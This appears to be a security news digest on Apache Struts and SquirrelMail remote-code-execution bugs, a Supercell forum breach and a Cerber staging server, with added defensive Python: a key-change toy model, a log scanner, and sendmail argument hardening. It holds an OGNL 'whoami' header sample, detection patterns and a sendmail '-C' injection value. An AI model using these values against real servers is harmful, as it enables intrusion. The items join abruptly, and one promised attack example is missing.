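    key_id: str  # identity key the queued ciphertext was prepared for


@dataclass
class SenderClient:
    """Sender side of the toy model. 'trusted' is the recipient key the sender
    last accepted, i.e. what a security-code verification would confirm."""
    policy: str                          # "auto_resend" or "block_and_notify"
    trusted: Dict[str, str]
    notify_on_key_change: bool = False   # the opt-in setting the article mentions
    queue: List[PendingMessage] = field(default_factory=list)
    delivered: List[Tuple[str, str, str]] = field(default_factory=list)  # (to, body, key_id)
    notices: List[str] = field(default_factory=list)

    def send(self, to: str, body: str) -> None:
        """Queue a message bound to the key the sender currently trusts."""
        self.queue.append(PendingMessage(to, body, self.trusted[to]))

    def flush(self, directory: Dict[str, str]) -> None:
        """Attempt delivery against the key the server currently advertises."""
        remaining: List[PendingMessage] = []
        for m in self.queue:
            current = directory[m.to]
            if current == m.key_id:
                self.delivered.append((m.to, m.body, m.key_id))
            elif self.policy == "auto_resend":
                # Re-bind to the new key and resend; nobody is asked first.
                self.trusted[m.to] = current
                self.delivered.append((m.to, m.body, current))
                if self.notify_on_key_change:
                    self.notices.append(f"{m.to}: security code changed (message already resent)")
            else:
                # Hold the message; the user must act on the new security code.
                self.notices.append(f"{m.to}: security code changed; message held until you verify")
                remaining.append(m)
        self.queue = remaining

    def accept_new_key(self, to: str, key_id: str) -> None:
        """The user verified the new security code out of band; re-bind queued messages."""
        self.trusted[to] = key_id
        for m in self.queue:
            if m.to == to:
                m.key_id = key_id


def simulate(policy: str, notify: bool = False) -> SenderClient:
    """Alice queues a message while Bob is offline; Bob's key changes before delivery."""
    directory = {"bob": "key-v1"}           # what the server currently advertises
    alice = SenderClient(policy=policy, trusted={"bob": "key-v1"}, notify_on_key_change=notify)
    alice.send("bob", "meet at 9")
    directory["bob"] = "key-v2"             # Bob reinstalled the app or got a new phone
    alice.flush(directory)
    return alice


if __name__ == "__main__":
    for policy in ("auto_resend", "block_and_notify"):
        a = simulate(policy)
        print(policy, "delivered:", a.delivered, "queued:", len(a.queue), "notices:", a.notices)
```

The point the model makes is who controls `directory`: under `auto_resend` a party that can change the advertised key (the server) causes the queued message to go out under a key the sender never checked, silently unless the opt-in notice is enabled; under `block_and_notify` nothing leaves until `accept_new_key` is called, which is the step a security-code comparison stands in for.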
Cisco's Talos says they've observed active attacks against a zero-day vulnerability in Apache's Struts, a popular Java application framework. Cisco started investigating the vulnerability shortly after it was disclosed, and found a number of active attacks. In an advisory issued on Monday, Apache says the problem with Struts exists within the Jakarta Multipart parser. "It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user," the warning explained. "If you are using Jakarta based file upload Multipart parser, upgrade to Apache Struts version 2.3.32 or 2.5.10.1. You can also switch to a different implementation of the Multipart parser." The alternative is the Pell parser plugin, which uses Jason Pell's multipart parser instead of the Commons FileUpload library, Apache explains. In addition, administrators concerned about the issue could just apply the proper updates, which are currently available. In a blog post, Cisco said they discovered a number of attacks that seem to be leveraging a publicly released proof-of-concept to run various commands. Such commands include simple ones ('whoami') as well as more sophisticated ones, including pulling down a malicious ELF executable and running it.
An example of one attack, which attempts to copy the file to a harmless directory, ensure the executable runs, and ensure the firewall is disabled at boot-up, is below: Both Cisco and Apache urge administrators to take action, either by patching or ensuring their systems are not vulnerable. This isn't the first time the Struts platform has come under attack. In 2013, Chinese hackers were using an automated tool to exploit known vulnerabilities in order to install a backdoor.
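The advisory's description (an invalid Content-Type value reaching the Jakarta parser's exception path) gives a defender a usable signal: a Content-Type header that is not a media type at all. As an added example, not from Cisco Talos or Apache, the Python below parses access log lines that record the request's Content-Type and flags values that either contain OGNL expression markers or fail a conservative media-type grammar. The log layout (combined format plus a trailing quoted Content-Type field), the marker list and all sample lines are constructed for the example; the malicious sample is a marker fragment, not a working payload.

```python
import re
from typing import Dict, List, Optional

# Fragments that never occur in a legitimate media type but do when an OGNL
# expression is placed in the header. Chosen for this example, not a published signature.
OGNL_MARKERS = re.compile(r"%\{|\$\{|#\w+\s*=|@[\w.]+@")

# Conservative media-type grammar: type/subtype plus ";name=value" parameters.
# Narrower than RFC 7231 on purpose; anything outside it deserves a look.
MEDIA_TYPE = re.compile(r'^[\w.+-]+/[\w.+-]+(\s*;\s*[\w.+-]+=("[^"]*"|[^;\s"]+))*\s*$')

# Assumed log layout: Apache "combined" format with one extra quoted field
# holding the request Content-Type (a LogFormat customisation, assumed here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<ctype>[^"]*)"$'
)

# Constructed sample lines; addresses are private/documentation ranges, paths are made up.
SAMPLE_LOG = """
10.0.0.5 - - [07/Mar/2017:10:01:02 +0000] "POST /app/upload.action HTTP/1.1" 200 512 "-" "Mozilla/5.0" "multipart/form-data; boundary=----FormBoundary7MA4YWxk"
10.0.0.9 - - [07/Mar/2017:10:01:07 +0000] "POST /app/upload.action HTTP/1.1" 500 1934 "-" "python-requests/2.13" "%{(#cmd='whoami')}"
10.0.0.5 - - [07/Mar/2017:10:02:15 +0000] "POST /app/login.action HTTP/1.1" 302 0 "-" "Mozilla/5.0" "application/x-www-form-urlencoded"
203.0.113.7 - - [07/Mar/2017:10:03:41 +0000] "POST /app/upload.action HTTP/1.1" 500 1934 "-" "curl/7.52.1" "multipart/form-data boundary=abc{{"
"""


def classify_content_type(ct: str) -> Optional[str]:
    """Return a reason string if the Content-Type looks hostile, else None."""
    if OGNL_MARKERS.search(ct):
        return "ognl-marker"
    if not MEDIA_TYPE.match(ct):
        # The case the advisory describes: an invalid value that makes the
        # Jakarta parser throw and render an error message from it.
        return "malformed-media-type"
    return None


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into named fields, or None if it does not fit the layout."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text: str) -> List[Dict[str, str]]:
    """Return the records whose Content-Type is suspicious, with a 'reason' field added."""
    hits: List[Dict[str, str]] = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line.strip())
        if rec is None:
            continue
        reason = classify_content_type(rec["ctype"])
        if reason:
            hits.append({**rec, "reason": reason})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f'{h["ip"]} {h["method"]} {h["path"]} {h["status"]} {h["reason"]}: {h["ctype"]!r}')
```

A `malformed-media-type` hit paired with a 500 response is the combination to correlate with the application's own error log, since the advisory says the parser's exception is what gets rendered; an `ognl-marker` hit is worth treating as an attempt regardless of status, because a patched server also answers such requests with an error. Logging the Content-Type header is the one prerequisite, and it is not part of the default combined format.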
A breach of the Clash of Clans creator has exposed credentials for forum users. Supercell, the force behind that popular mobile game and others, said that a vulnerability in the software it uses to run its forums allowed third-party hackers to gain illegal access to some forum user information, including a number of emails and encrypted passwords. To provide its forum service, it uses software from vbulletin.com. The company said that its preliminary investigation suggests that the breach happened in September 2016—and that it has since been fixed. "We take any such breaches very seriously and we follow very strict policies when it comes to security," Supercell said in a statement. "Please note that this breach only affects our Forum service. Game accounts have not been affected." Avast Threat Labs senior malware analyst Jan Sirmer commented via email on the danger of attacks like these. "The forum administrators in this case do bear some responsibility—the vBulletin software being used to host the Supercell forum was out-of-date, and it's up to the administrators to keep software like that up-to-date," he said. "Online gamers are vulnerable to these kinds of hacks because they provide their data to third parties—but the same is true for everyone who uses any online service." Users should change the password they're using on the forum as soon as possible, along with the password in any other systems they're using with the same login. "The information the hackers obtained can either be used by the hackers themselves or sold on the darknet for other hackers to abuse," Sirmer said. "As many people use the same login credentials to log in to online services, hackers try to use login credentials they get to gain access into other accounts."
A security researcher that only goes by the nickname of Racco42 discovered the vulnerability on Thursday, January 12. The issue affected only one Cerber server, not all, and was most likely due to a misconfiguration. The server wasn't a command and control server, but a mere staging server from where the victims' computers would connect and download the actual ransomware, which would later run and infect their PCs. An error in one of the server files (hxxp://truthforeyoue.top/search.php) displayed page source code, instead of executing it. This information found its way to Avast security researcher Jaromir Horejsi, who together with the Avast team leveraged this error to get control over the server. For a period of three hours, the Avast team explains, they collected information from server logs. The Avast team observed over 700 users download Cerber installers, which ran on their PCs. Extrapolating this number to a whole day, just one typical Cerber ransomware staging server would be able to deliver payloads to around 8,400 users during a spam run peak or malvertising campaigns.
Users of open source webmail software SquirrelMail are open to remote code execution due to a bug (CVE-2017-7692) discovered independently by two researchers. "If the target server uses Sendmail and SquirrelMail is configured to use it as a command-line program, it's possible to trick sendmail into using an attacker-provided configuration file that triggers the execution of an arbitrary command," the explanation provided by MITRE reads. "For exploitation, the attacker must upload a sendmail.cf file as an email attachment, and inject the sendmail.cf filename with the -C option within the 'Options > Personal Informations > Email Address' setting." The bug was found by researchers Filippo Cavallarin and Dawid Golunski, independently of one another, and affects SquirrelMail versions 1.4.22 and below. Golunski reported it to SquirrelMail (sole) developer Paul Lesniewski, who asked for a delay of publication of the details until he could fix the flaw. But as Cavallarin published details about it last week (after not receiving any reply from the SquirrelMail developer), Golunski did the same during the weekend. Both researchers provided a proof-of-concept exploit for the flaw, and Cavallarin even offered an unofficial patch for plugging the hole. All this prompted Lesniewski to push out a patch on Monday, and new, patched version snapshots of the software (1.4.23-svn and 1.5.2-svn). He also told The Register that exploitation of the bug is difficult to pull off.
"In order to exploit the bug, a malicious user would need to have already gained control over a mail account by other means, SquirrelMail would need to be configured to allow users to change their outgoing email address (we recommend keeping this disabled), the user would need to determine the location of the attachments directory (by gaining shell access or making guesses), the permissions on said directory and files would need to allow access by other processes (by default this will usually be the case, but prudent admins will exert more stringent access controls) and of course, SquirrelMail needs to be configured to send via Sendmail and not SMTP (default is SMTP)," he explained. Still, according to Golunski, the 1.4.23 version snapshot offered on Monday was still vulnerable. But another one was pushed out today, so it's possible that the issue was finally, definitely fixed. Users can wait to update their installation until things become more clear, and in the meantime, they can protect themselves by configuring their systems not to use Sendmail.
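Lesniewski's list of preconditions all hinge on one code shape: a user-controlled address spliced into a sendmail command line, where a `-C` inside the string becomes an option sendmail honours. The Python below is an added illustration of that shape and of its hardened counterpart; it is not SquirrelMail's PHP and never executes sendmail. The address grammar, `SENDMAIL_PATH` and the constructed `INJECTED_SENDER` value (with a placeholder attachment path) are assumptions of the example.

```python
import re
import shlex
from typing import List

# Conservative address grammar, an assumption of this example: one local part,
# one domain, no whitespace and none of the characters an option parser or a
# shell could act on. Deliberately narrower than RFC 5322.
SAFE_ADDRESS = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")

SENDMAIL_PATH = "/usr/sbin/sendmail"  # assumed location; nothing here executes it

# Constructed attacker input in the shape MITRE describes; the path is a placeholder.
INJECTED_SENDER = "user@example.com -C /ATTACHMENT_DIR/sendmail.cf"


def naive_check(addr: str) -> bool:
    """The kind of test that lets the bug through: 'looks like an address'."""
    return "@" in addr and "." in addr.split("@", 1)[1]


def is_safe_address(addr: str) -> bool:
    """Strict whitelist; also refuses anything that could be parsed as an option."""
    return bool(SAFE_ADDRESS.fullmatch(addr)) and not addr.startswith("-")


def unsafe_command_line(sender: str, recipient: str) -> str:
    """Vulnerable shape: the user string is concatenated into a shell command line."""
    return f"{SENDMAIL_PATH} -i -f {sender} {recipient}"


def argv_seen_by_sendmail(sender: str, recipient: str) -> List[str]:
    """What the program receives after the shell word-splits the line above."""
    return shlex.split(unsafe_command_line(sender, recipient))


def build_sendmail_argv(sender: str, recipients: List[str]) -> List[str]:
    """Hardened shape: every address validated, one argv element each, no shell."""
    for addr in (sender, *recipients):
        if not is_safe_address(addr):
            raise ValueError(f"refusing address {addr!r}")
    argv = [SENDMAIL_PATH, "-i", "-f", sender, *recipients]
    # Only the two flags this code itself added may begin with '-'.
    assert all(a in ("-i", "-f") or not a.startswith("-") for a in argv[1:])
    return argv


def hardened_accepts(sender: str) -> bool:
    """Convenience wrapper: does the hardened path accept this sender?"""
    try:
        build_sendmail_argv(sender, ["recipient@example.org"])
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("naive check passes injected value:", naive_check(INJECTED_SENDER))
    print("argv the vulnerable shape produces:", argv_seen_by_sendmail(INJECTED_SENDER, "recipient@example.org"))
    print("hardened path accepts injected value:", hardened_accepts(INJECTED_SENDER))
```

`argv_seen_by_sendmail` shows why the attachment path matters: after word-splitting, `-C` and the path arrive as two separate arguments, indistinguishable from options the application meant to pass. The configuration changes the article names (sending via SMTP rather than a sendmail binary, and keeping the outgoing-address setting non-editable) remove the vector entirely; the validation above is the defence-in-depth layer for code that must shell out.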